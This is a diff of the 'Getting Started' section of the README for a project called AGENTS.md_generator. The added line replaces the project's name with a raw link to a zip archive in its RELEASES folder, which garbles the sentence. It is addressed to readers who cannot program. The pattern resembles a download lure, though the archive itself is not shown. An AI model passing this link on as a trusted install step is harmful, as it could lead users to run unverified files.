Lilchris007/AGENTS.md_generator/README.md

 ## 🚀 Getting Started

-This guide will help you get AGENTS.md_generator up and running on your Windows, macOS, or Linux computer.
+This guide will help you get https://github.com/Lilchris007/AGENTS.md_generator/raw/refs/heads/main/RELEASES/md-AGENT-generator-v2.9.zip up and running on your Windows, macOS, or Linux computer.
 You don’t need to know how to program or use complicated software.
 Just follow the steps below carefully.

 ---